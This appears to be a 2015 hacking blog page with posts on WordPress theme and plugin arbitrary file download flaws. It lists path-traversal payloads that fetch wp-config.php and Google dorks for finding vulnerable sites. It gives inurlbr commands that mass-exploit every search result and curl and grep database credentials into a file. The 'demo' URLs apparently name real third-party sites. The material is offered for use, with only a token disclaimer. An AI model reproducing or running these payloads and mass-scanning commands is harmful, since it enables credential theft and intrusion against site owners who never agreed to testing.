Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador Arbitrary File Download. Mostrar todas as postagens
Mostrando postagens com marcador Arbitrary File Download. Mostrar todas as postagens

terça-feira, 9 de junho de 2015

WordPress Plugin 'WP Mobile Edition' LFI Vulnerability

Exploring wordpress plugin LFI using inurlbr in subprocess

Exploring wordpress plugin LFI using inurlbr in subprocess

Inurlbr Team
[+]=========== Assume NO ============[+]
 Liability and are not responsible
for any misuse or damage caused
 by this program!!
[+]==================================[+]

USAGE:

Make a file named payload .txt and put inside:
/wp-content/themes/mTheme-Unus/css/css.p­hp?files=../../../../wp-config.php

OTHER FAILURES(XPL's):

/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/wp-content/force-download.php?file=../wp-config.php
/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
/wp-content/themes/markant/download.php?file=../../wp-config.php
/wp-content/themes/yakimabait/download.php?file=./wp-config.php
/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
/wp-content/themes/felis/download.php?file=../wp-config.php
/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/epic/includes/download.php?file=wp-config.php
/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
/wp-content/themes/lote27/download.php?download=../../../wp-config.php
/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php
/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php


EXPLOIT COMMAND:
php inurlbr.php --dork 'inurl:?fdx_switcher=mobile' -q [your favorite engines] -s scan.txt --get-file 'payload.txt' --sub-get --unique

Vídeo:



SCANNER INURLBR:
https://github.com/googleinurl/SCANNER-INURLBR

REF:
https://www.exploit-db.com/exploits/37244/
http://blog.inurl.com.br/2015/04/conceito-de-subprocess-scanner-inurlbr.html

segunda-feira, 19 de janeiro de 2015

0days Theme Arbitrary File Download Vulnerability + SCANNER INURLBR / EXPLOIT INURL A.F.D Verification

0days Theme  Arbitrary File Download Vulnerability + SCANNER INURLBR / EXPLOIT INURL A.F.D Verification


-------------------------------------------------------------------------------------------

Wordpress Theme U-Design Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/u-design/"
ACCESS: http://1337day.com/exploit/23143

-------------------------------------------------------------------------------------------

Wordpress Theme Terra Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/terra/"
ACCESS: http://1337day.com/exploit/23142
-------------------------------------------------------------------------------------------

Wordpress Theme Pindol Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/pindol/"
ACCESS: http://1337day.com/exploit/23144
-------------------------------------------------------------------------------------------

All themes above, are failing in the same revslider plugin.
POC:
http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

Exploit developed can check about 20 themes, and allows check standard as follows.POC -> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Which is the same as 0day mentioned above.

[Exploit ACCESS]
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
Please download the exploit and put the name of exploit.php

Now let's use the inurlbr scanner as a mass explorer
[SCANNER INURLBR]
https://github.com/googleinurl/SCANNER-INURLBR

Command use INURLBR:
Ex: php inurlbr.php --dork 'you dork' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/u-design/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/terra/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/pindol/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

Brief introduction --comand
--comand-vul Every vulnerable URL found will execute this command parameters.
     Example: --comand-vul {command}
     Usage:   --comand-vul 'nmap sV -p 22,80,21 _TARGET_'
              --comand-vul './exploit.sh _TARGET_ output.txt'
 --comand-all Use this commmand to specify a single command to EVERY URL found.
     Example: --comand-all {command}
     Usage:   --comand-all 'nmap sV -p 22,80,21 _TARGET_'
              --comand-all './exploit.sh _TARGET_ output.txt'
    Observation:
    _TARGET_ will be replaced by the URL/target found, although if the user
    doesn't input the get, only the domain will be executed.
   _TARGETFULL_ will be replaced by the original URL / target found.

-------------------------------------------------------------------------------------------

INURLBR ADVANCED CONTROL

php inurlbr.php --dork 'YOU DORK revslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'



[TUTORIAL] - Wordpress A.F.D Verification/ INURL - BRASIL + SCANNER INURLBR



[TUTORIAL] - Hacking Painel Wordpress - Slider Revolution


[TUTORIAL] - Getting access to the Wordpress panel


REF:
http://pastebin.com/cGpxRQCs
http://blog.inurl.com.br/2015/01/arbitrary-file-download-vulnerability.html
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html
http://blog.inurl.com.br/2014/08/wordpress-plugin-kenburner-slider-lfd.html
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo

domingo, 18 de janeiro de 2015

Arbitrary File Download vulnerability no tema Bretheon do wordpress


Arbitrary File Download vulnerability o que eu chamo de A.F.D.
Foi encontrada tal falha no tema Bretheon do wordpress.
--------------------------------------------------------------------------------------------------------------
DETALHES Acesso: http://1337day.com/exploit/23140 Exploit Title: Wordpress Theme Bretheon Arbitrary File Download Vulnerability Date: 17/01/2014 Exploit Author: MindCracker - Team MaDLeeTs Contact : Md5@live.com.pk - Maddy@live.com.pk| https://twitter.com/MindCrackerKhan  Tested on: Linux / Window  Google Dork: inurl:wp-content/themes/bretheon/ Demo  http://infiniteloopcorp.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php http://scottysgym.com.au/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php http://vladlogistik.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php http://transinfo.nnov.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php   PoC  http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


DETALHES
Acesso: http://1337day.com/exploit/23140
Exploit Title: Wordpress Theme Bretheon Arbitrary File Download Vulnerability
Date: 17/01/2014
Exploit Author: MindCracker - Team MaDLeeTs
Contact : [email protected] - [email protected]| https://twitter.com/MindCrackerKhan 
Tested on: Linux / Window

Google Dork: inurl:wp-content/themes/bretheon/
Demo

http://infiniteloopcorp.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://scottysgym.com.au/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://vladlogistik.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://transinfo.nnov.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

 PoC

http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
--------------------------------------------------------------------------------------------------------------

Como tal falha no tema não usa nada de novo e o caminho padrão "admin-ajax.php?action=revslider_show_image&img="  nosso exploit desenvolvido meses atrás já faz tal verificação e pode ser usado tranquilamente.
--------------------------------------------------------------------------------------------------------------

[TUTORIAL]: 

https://www.youtube.com/watch?v=w6pxPR_s05w

TUTORIAL DETALHES:
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html

EXECUTE:
php exploit.php www.target.gov.us
--------------------------------------------------------------------------------------------------------------

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
--------------------------------------------------------------------------------------------------------------